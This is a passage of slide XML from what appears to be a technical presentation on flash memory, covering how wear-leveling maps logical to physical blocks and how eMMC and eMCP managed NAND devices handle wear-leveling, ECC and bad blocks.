        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA7C04EF-C6A3-4784-B05D-CE5CE6F05B4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515544" y="95991"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How wear-leveling works</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" b="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1A9A5F2-3460-4EB2-9DCE-7064037BB01C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2497654" y="3929361"/>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block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5345C87C-6CB6-47C3-B06B-761CA0586765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4126157" y="3929360"/>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block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D3DFA3-0EB5-4AEB-A0A3-A1A3D74DBD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732888" y="3929360"/>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block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7171A2F-1D20-4304-9544-6CE99D1DECCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2497654" y="5424898"/>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 block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B27C81-5A25-4EFA-9EF3-A76AB90C995C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4126157" y="5424897"/>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 block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C8D2B2A-F943-4A54-88C3-73FF84829BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732888" y="5424897"/>
            <a:ext cx="1393372" cy="5617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bad block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9632C2F0-D86F-441C-817E-64394AF1DDDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7339619" y="5424897"/>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 block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85CE2A1-FF42-4075-9666-5457344ED104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8911516" y="5424897"/>
            <a:ext cx="1393372" cy="561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free block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E4C2C6-DB71-4778-87D2-407C29DE0607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10479058" y="5424896"/>
            <a:ext cx="1393372" cy="561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free block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4720B29B-4B0C-4964-AEE4-F6AC5831F29B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3194340" y="4491064"/>
            <a:ext cx="0" cy="93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92CB69-BAEE-4810-9DB9-5FAD776C1787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4822843" y="4491063"/>
            <a:ext cx="0" cy="93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B1DE86-E999-40AF-B2CD-9DE644BECE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429574" y="4491063"/>
            <a:ext cx="1606731" cy="93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39F519C-2EC0-4A40-B44B-742F71B8476B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651370" y="3320703"/>
            <a:ext cx="1654400" cy="141637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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block to be changed</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85416C86-1933-416D-9050-43132F5CB60B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7232939" y="5298784"/>
            <a:ext cx="1581570" cy="107557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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4712E56F-9B4C-46FD-8F50-CB8D4B09B5E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8855998" y="5298784"/>
            <a:ext cx="1581570" cy="107557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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>write block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{017A6D71-B8EA-46F4-8CB6-6991932A4336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429574" y="4491063"/>
            <a:ext cx="3178628" cy="93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4D5B058-B1FD-43F6-898E-340CF30CE56F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7339619" y="5424895"/>
            <a:ext cx="1393372" cy="5617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dirty block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA07A12-6028-4D00-92FE-3F29FD75138F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8921188" y="5424894"/>
            <a:ext cx="1393372" cy="561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 block</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C845E4AC-902F-41F2-8254-DB1010092ED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905194" y="4028892"/>
            <a:ext cx="1315873" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logical level</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{355632C8-E0E5-4F9D-AFD7-1BB4BB73C5DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905194" y="5521079"/>
            <a:ext cx="1415259" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical level</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rechteck 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A816DE91-0C78-4B80-A27D-8814DF9F7E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9888528" y="3929360"/>
            <a:ext cx="1881983" cy="401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Simplified!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF79C4D8-1ED6-0B41-AE81-0047B581BAB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1CC6C5-0B4A-4B4E-876D-F7CCB421B827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421489" y="1433103"/>
            <a:ext cx="11160911" cy="4693062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Multiple copies of the data may exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data is not being erased as long as the block is not erased</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Size of copies is usually &gt; 2KByte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data changed regularly copied more often</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95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1" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="1" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="2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2FCE-3966-4E60-B2E4-238EF46243DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="48395"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Block devices</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" b="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FB14195-DAD3-4373-AAB0-B87A826A8CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190861" y="1428994"/>
            <a:ext cx="8742461" cy="4863142"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Also known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>managed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> NAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Standards: eMMC 4.x, 5.x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eMMC:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flash with integrated controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Packages: FBGA-153</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eMCP</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Like eMMC, but with on-chip DRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advantage: RAM + flash on one chip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Packages: FBGA-162, 221</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Under Linux: normal block storage device, supports Ext2/3/4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Integrated wear-leveling, ECC, bad-block management by FTL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BAECEF3-6C32-412C-956F-5DDEB5BEBBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8924872" y="1223447"/>
            <a:ext cx="3121152" cy="243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Rounded Corners 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{979A831A-53E7-4632-8979-34108EA14FCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9107752" y="1333333"/>
            <a:ext cx="2810256" cy="77001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NAND flash</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4C44BE3-3849-4ABF-8A6D-9AF256F0F460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8924872" y="4851109"/>
            <a:ext cx="3121152" cy="8957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Host processor</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle: Rounded Corners 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C57BAF-F859-47A6-A114-8E3F4CC2911D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9054412" y="2213231"/>
            <a:ext cx="2916936" cy="13500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Integrated controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wear leveling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ECC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad-block management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F941C56-BC17-46FC-801F-0248CC740343}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11045970" y="3658767"/>
            <a:ext cx="0" cy="120154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ECB7E7F-80BE-4EC8-87D0-766A9E41DE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11288624" y="3683695"/>
            <a:ext cx="0" cy="1176612"/>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4" name="Arrow: Up-Down 13">
